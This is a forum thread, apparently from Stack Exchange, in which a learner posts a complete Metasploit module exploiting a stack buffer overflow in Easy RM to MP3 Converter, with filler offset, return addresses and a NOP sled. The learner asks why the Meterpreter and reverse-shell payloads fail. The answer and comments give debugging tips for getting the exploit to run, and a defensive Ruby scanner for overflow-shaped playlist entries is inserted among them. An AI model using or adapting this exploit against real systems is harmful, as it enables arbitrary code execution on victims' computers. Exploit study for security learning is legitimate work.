I started learning exploit writing some time back and created a few exploits, one of them being for Easy RM to MP3 Converter, and it worked pretty well. However, now I thought about converting my exploits to Metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a Meterpreter session or a shell when using a Meterpreter payload. After making some changes, here is what I used:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in version 2.7.3.700.
        By creating a specially crafted .m3u8 file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Crazy_Hacker', # Original
          'buzz',
        ],
      'Version'        => 'Version 1',
      'References'     =>
        [
          [ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP2 (En)',    { 'Ret' => 0x01A13F01 } ], # Universal Address (MSRMCcodec02.dll)
          [ 'Windows XP SP3 (Fr)',    { 'Ret' => 0x01AAF23A } ], # FFE4, JMP ESP from (MSRMCcodec02.dll)
          [ 'Windows XP (Universal)', { 'Ret' => 0x773D4540 } ], # JMP ESP in (SHELL32.DLL)
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u']),
      ], self.class)
  end

  def exploit
    sploit  = "A" * 26068            # rand_text_alphanumeric(26068) # filler up to the saved return address
    sploit << [target.ret].pack('V') # selected target's return address, little-endian
    sploit << "\x90" * 30            # nopsled
    sploit << payload.encoded        # encoded payload (must respect Space/BadChars above)
    sploit << "B" * 1000             # trailing padding
    buzz = sploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buzz)
  end

end

I tried out a number of payloads: meterpreter/reverse_tcp, shell/reverse_tcp, etc., but none seem to work. Any solutions?

crusy
user27812
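The module above writes a playlist whose single entry is tens of kilobytes of filler followed by a NOP sled, which is nothing like a real path or URL. From the defender's side, that shape is easy to spot in a file scanner. The following is an added example, not code from the question or from Metasploit; the size threshold and sled length are assumptions, and the two playlists are constructed inline.

```ruby
# Added example: flag .m3u/.m3u8 playlist entries shaped like an overflow input.
# MAX_ENTRY_LEN and NOP_SLED are assumptions, not values taken from the question.
MAX_ENTRY_LEN = 4096            # assumption: no legitimate path/URL is this long
NOP_SLED      = ("\x90" * 16).b # assumption: 16 consecutive NOPs is a sled, not data

# Constructed sample inputs (not real files).
BENIGN_M3U  = "#EXTM3U\n#EXTINF:123,Sample\nC:\\Music\\track01.mp3\nhttp://example.com/stream.m3u8\n".b
SUSPECT_M3U = ("#EXTM3U\n" + "A" * 26068 + "\x90" * 30 + "C" * 100 + "\n").b

# Scans playlist data and returns one finding per suspicious entry:
# { line: <1-based line number>, reasons: [<why it was flagged>, ...] }
def scan_m3u(data)
  findings = []
  data.b.split(/\r?\n/).each_with_index do |line, idx|
    next if line.start_with?('#')   # #EXTM3U / #EXTINF directives and comments
    reasons = []

    # Overflow inputs are far longer than any playlist entry needs to be.
    reasons << "entry length #{line.bytesize} exceeds #{MAX_ENTRY_LEN}" if line.bytesize > MAX_ENTRY_LEN

    # A run of a single repeated byte (e.g. "A" * 26068) is a classic filler pattern.
    if line =~ /(.)\1{999,}/m
      reasons << "run of #{Regexp.last_match(0).bytesize} identical bytes"
    end

    # x86 NOP sleds have no business in a playlist path.
    reasons << 'contains NOP sled' if line.include?(NOP_SLED)

    # Control bytes (other than tab) never appear in a legitimate path or URL.
    reasons << 'control bytes in entry' if line.bytes.any? { |b| b < 0x20 && b != 0x09 }

    findings << { line: idx + 1, reasons: reasons } unless reasons.empty?
  end
  findings
end

if __FILE__ == $0
  puts "benign:  #{scan_m3u(BENIGN_M3U).inspect}"
  puts "suspect: #{scan_m3u(SUSPECT_M3U).inspect}"
end
```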

1 Answer


You should also provide more details about the OS you are using and the params you have provided to run the module.

As you can see the pointer to Ret differs depending on the OS.

Have you attached a debugger yet to see what happens within the application? From what I can see and know about the exploit, your fuzzing string doesn't seem to be appropriate for the buffer:

sploit = "A" * 26068

It should be more than that. Attach a debugger and look if EIP has been overwritten.

Regards, T0X1C

  • Using Windows XP SP3; I have done the above test and even made it run with a simple Ruby script using Immunity Debugger (have checked EIP, checked for bad chars, etc.). It's only when I use Metasploit that the payload isn't working –  Jul 01 '13 at 12:06
  • What does the Ruby script look like which you have used, and are you sure that you can use the JMP ESP from 0x773D4540 as universal? A screenshot of the debugger might be useful as well –  Jul 01 '13 at 13:47
  • Sorry, but this is only my 2nd question on Stack Overflow and I don't have enough points to post an image. I'll try to gather and post it soon. Any suggestions without the image? – user27812 Jul 02 '13 at 09:20